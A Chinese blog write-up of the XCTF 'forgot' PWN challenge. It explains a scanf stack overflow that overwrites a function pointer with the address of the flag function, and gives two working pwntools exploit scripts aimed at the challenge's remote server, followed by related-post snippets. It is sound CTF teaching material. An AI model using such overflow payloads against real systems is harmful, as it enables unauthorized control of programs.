攻防世界(PWN)forgot

最新推荐文章于 2022-06-21 14:26:19 发布
最新推荐文章于 2022-06-21 14:26:19 发布
阅读量259 收藏 2
点赞数
分类专栏: # PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43876357/article/details/109028936
版权

感觉有些wp写的不是特别详细,当时我看的时候有的地方也是看不太懂...

先拖进ida中看一下:

找到溢出点,因为我们分配给了v2 32byte的内存,但是scanf不限制长度,所以这里可以溢出。

第88行就是决定程序走向的语句了。

初步思路就是栈上的变量覆盖,在v2这里溢出,覆盖掉v3,然后让程序走到sub_80486CC:

既然我们要覆盖v3,那么根据(&v3+ --v14)我们需要让v14的值不变,因为v14 = 1则--v14 = 0,这样程序就会顺利的走到v3.

观察switch-case发现输入大写字母v14不会改变,然后直接写exp:

exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

#p = process("./forgot.txt")#不在同一路径则打出路径
p = remote('220.249.52.133','58230')

p.sendline('by')#这里随便输入即可
addr=0x80486CC
payload='A'*(0x20)+p32(addr)
#这里输入小写会出错,因为输入小写字母v14变为2,这个时候覆盖v3是没有用的,因为程序已经走到v4了
#如果输入小写字母,应该再加四个字节,这样会在v4溢出
#payload='a'*(0x20)+'bbbb'+p32(addr)

p.sendline(payload)

p.interactive()

可能在搜索过程中有看到有的exp直接用'a'*0x67溢出的,这里我来解释一下:

from pwn import *

#p = process("./forgot.txt")#不在同一路径则打出路径
p = remote('220.249.52.133','58230')

system_addr = 0x80486cc

payload = 67 * 'a'#任意字符
payload += p32(system_addr)

p.sendline(payload)

p.interactive()

fgets函数会接收(n-1)个字符,那么在这道题中它将接受31个字符就会停止,剩下的36个'a'就是我们上述说的'a'*32再加4个字节(这里就是'aaaa'),同样如果换成大写就是63 * 'A'来进行溢出。

fgets函数功能为从指定的流中读取数据,每次读取一行。其原型为:char *fgets(char *str, int n, FILE *stream);从指定的流 stream 读取一行,并把它存储在 str 所指向的字符串内。当读取 (n-1) 个字符时,或者读取到换行符时,或者到达文件末尾时,它会停止,具体视情况而定。

总结:

在做题的时候,一定要彻底弄懂它的逻辑才行,不要直接看到exp,都不太明白就直接get flag了...

43v3rY0unG
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 forgot
10-04 1268
1.题目 2.IDA分析 3.流程分析 流程:输入名字,邮箱,邮箱校验完,执行v3+--v14处的代码。v3原本指向sub_8048604的,我们发现sub_80486CC才是我们需要运行的函数。 思路:①为了避免v14影响结果,输入字符避免进入case判断。②通过输入邮箱进行栈溢出覆盖v3的内容,使它指向sub_80486CC。exp如下: from pwn import * #io = process('./level2') io = remote('220.249.52...
forgot pwn 入门题
02-11
pwn 入门题
攻防世界pwn题:forgot
m0_62396648的博客
06-05 501
该文件是32位的,canary和PIE保护机制没开。总览:该函数就是:v5初值为1,对v2输入一串字符。然后执行一个会根据输入的字符串而修改v5的循环语句,最后调用相应的函数。同时,发现文件里面已经含有cat flag的函数: 函数snprintf介绍: printf("cat %s", "./flag")是将cat ./flag输出到屏幕上。 snprintf(s, 0x32, "cat %s", "./flag")是最多将后
攻防世界PWN刷题-forgot
m0_53932372的博客
12-30 2271
forgot 这题,可有意思了。 大晚上的,有点迷。看了几个wp,一个比一个离谱(太简单了)。 后来自己试了试,还真是······ 思路:本题出现了指针变量并且进行了调用,所以可以利用栈溢出漏洞将该地址覆盖为后门函数的地址,让程序正常执行就可以拿到flag。 坑:一定要注意啊对v5的判定。 v5初值为1,进过下面的判断等操作后,其值被改变,而v5的值决定了程序调用那个指针所指的位置。 exp一定要注意,输入的v2的第一个字符,决定了v5的值。 当输入a的时候,经过判定,v5会变成2,则调用第2-1=1,也
攻防世界--进阶区--forgot
Rt1Text的博客
06-19 281
32位/只有NX保护输入的地方,是溢出点__isoc99_scanf("%s", v2);fgets(s, 32, stdin);fgets函数对输入的数据有限制,所以不会造成溢出 可以拿到flag的函数地址 main函数的内容还挺多的,1张没截完第二张是一个for循环额...........最后一行的代码不是很好看,查了查,可以看看它的汇编应该是调用v3[--v5]的一个函数[esp+78h]就是v5的位置要是可以控制v5也就可以调用函数了在for循环内v5的值一直在发生改变,所以不能让v5进入循环让v
攻防世界forgot
qq_49853414的博客
03-19 4302
adworld_forgot 这道题单纯的考对栈里数据的掌握,以及C程序调用 int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] BYREF _DWORD v3[10]; // [esp+30h] [ebp-54h] char s[32]; // [esp+58h] [ebp-2Ch] BYREF int v5; // [esp+78h] [ebp-Ch] size_t i; // [e
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
[攻防世界]forgot
逆向萌新的博客
06-21 229
[攻防世界]forgot详解
攻防世界)(pwn)forgot
PLpa的博客
07-21 2367
这题我也是想了好久啊,实在是没找到什么办法,后来还是把题目给摸透了根据经验一个个试出来的方法!!! 拿到题目下载附件查看保护: 只开了NX,嗯。。。 进入IDA,————惊了,这个是啥子意思??? 一大堆奇奇怪怪的东西,实在是看不懂,我们只能看看几个关键的输入点: 第一个输入name: 没有什么东西,进行看string v2 : 我们看到距离32的地方,有个0x54的函数指针: 找...
攻防世界(Pwn) forgot---栈溢出;(方法二)
半岛铁盒的博客
03-02 329
攻防世界(Pwn) forgot—栈溢出;(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[--v5] v5的值随着for循环 会发生改变 v2输入是溢出点 v2,v3两组数据在栈上是相邻的, v2的长度大于 20h之后就会覆盖v3的返回值了 干脆把v3[0]-v3[9]函数全部改为目标函数的地址就可以了:0x80486CC 此时无论v5等于什么,我们都会得到目标 fla
C表达式((void (*)(void))0();
雾里看花
11-17 1716
C表达式((void (*)(void))0();通过一步步来讲解: 没有参数和不返回值void f(void)定义一个指针没有参数和返回值void (*p)(void)定义一个仅有类型的指针(void(*))(void)定义一个强转类型(类型定义在括号内,跟着一个值)(void (*)(void))0到目前为止我们定义了一个由0强转成一个指向函数且返回值。这个转换时一个指针到函数的类型。(yo
override与final
weixin_50731537的博客
10-08 222
override是一个保障措施,保障派生类中的函数与基类中的虚函数的函数签名一致,否则会因为有些地方有区别而导致一些调试难以发现的错误. 例 Base1中形参是int,Base2中形参是float不一致. override相当于增加了一层保护措施,验证是不是函数签名都一致. final就相当于一个终止措施,被final修饰的类不能被继承,被final修饰的函数不能被重写. ...
[攻防世界 pwn]——forgot
Y_peak的博客
02-20 164
[攻防世界 pwn]——forgot 题目地址: https://adworld.xctf.org.cn/ 题目: 在checksec看下保护 在IDA中, 竟然有后面函数, 找到sub_80486CC函数地址 发现最后(*(&v3 + --v14))()执行 我们可以令v14 = 1这样就相当于v3所指向的函数执行 将v3所指向的函数地址覆盖为我们想要的函数地址就可以了 第一个栈溢出无法利用, 第二个可以利用 利用’\x00’开头的字符串绕过检查, v2距离v3 = 0x20 e
攻防世界-pwn forgot(栈内变量覆盖)
菜的只能随便写写博客
10-17 759
0x01 文件检查 32位elf 无栈保护 无地址随机化   0x02 程序运行分析  发现有两个输入的地方,并且第一个地方有回显。   0x03 IDA分析  如图,阅读程序结构后,发现第二个输入点(41行)可以进行栈溢出,第88行是调用的栈里面的函数地址,所以,如果将栈里面的*(&v3 + --v14)这个地址的内容变成我们需要的函数地址,就可以了。  搜索字符串,发...
攻防世界forgot——让人眼花目眩的一道题(详细菜鸡向)
weixin_48066554的博客
02-10 1490
攻防世界forgot——让人眼花目眩的一道题 今天做了一道攻防世界的进阶题,看起来复杂的一匹,但是实际上也就这吧 (随手关掉刚刚百度到的wp [doge]),做完后最直观的感受就是自己的代码阅读能力还有待提高。话不多说,先check个sec: 只开了NX(栈不可执行),四舍五入等于没开保护,直接上伪代码 反汇编伪代码如下: int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] BYREF _DWOR
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值